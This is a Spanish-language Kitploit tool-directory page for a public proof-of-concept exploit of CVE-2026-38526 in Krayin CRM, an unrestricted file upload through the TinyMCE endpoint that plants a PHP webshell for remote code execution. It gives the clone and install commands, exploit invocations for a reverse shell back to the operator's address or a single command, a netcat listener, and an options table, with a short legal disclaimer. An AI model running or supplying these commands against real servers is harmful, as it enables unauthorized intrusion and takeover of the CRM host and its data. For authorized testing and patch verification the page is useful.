Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-38526-POC — Prueba de concepto de CVE-2026-38526 en Krayin CRM <= v2.2.x. Carga arbitraria de archivos que conduce a ejecución remota de código. | Kitploit
Herramientas/GitHubGitHub/pawpic/cve-2026-38526-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónDesarrollo de Payloads
GitHubpawpic/cve-2026-38526-poc

CVE-2026-38526-POC

Prueba de concepto de CVE-2026-38526 en Krayin CRM <= v2.2.x. Carga arbitraria de archivos que conduce a ejecución remota de código.

Ver Repositorio
2hace 1 mesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-38526 - Exploit de RCE en Krayin CRM

Krayin CRM (≤ 2.2.x) - Carga de archivos sin restricciones que conduce a la ejecución remota de código.

Este PoC aprovecha el endpoint vulnerable de carga de TinyMCE (/admin/tinymce/upload) para subir un webshell PHP y lograr la ejecución de comandos en el servidor.


Características

  • Inicio de sesión totalmente automático con manejo de token CSRF
  • Omite las restricciones de carga mediante doble extensión
  • Admite shell inversa y ejecución de un único comando
  • Renovación fiable del token CSRF de Laravel
  • Limpio y fácil de usar

Descarga

root@kitploit:~
git clone https://github.com/pawpic/CVE-2026-38526-POC

Requisitos

root@kitploit:~
pip3 install requests beautifulsoup4

Uso

  1. Shell inversa (por defecto y recomendada)
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  --lhost YOUR_IP \
  --lport 4444
  1. Comando único
root@kitploit:~
python3 exploit.py \
  -u http://example.com \
  -e [email protected] \
  -p "example_pass" \
  -c "whoami"

Opciones

Ejemplo de flujo de trabajo

Inicia el listener:

root@kitploit:~
nc -lvnp 4444

Ejecuta el exploit:

root@kitploit:~
python3 exploit.py -u http://target.com -e [email protected] -p password --lhost IP_ADDR

Aviso legal

Este exploit está destinado únicamente a fines educativos y pruebas de penetración autorizadas. El uso no autorizado contra sistemas para los que no tengas permiso explícito de prueba es ilegal.

Versiones afectadas

Krayin CRM ≤ 2.2.x CVE: CVE-2026-38526

Autor: pawpic Fecha: 2026

Descargar herramienta
ArgumentoDescripciónRequerido
-u, --urlURL base del objetivoSí
-e, --emailCorreo electrónico de inicio de sesiónSí
-p, --passwordContraseña de inicio de sesiónSí
-c, --cmdEjecutar un único comandoNo
--lhostTu IP para la shell inversaSí (si no se usa --cmd)
--lportPuerto de escuchaNo (predeterminado: 4444)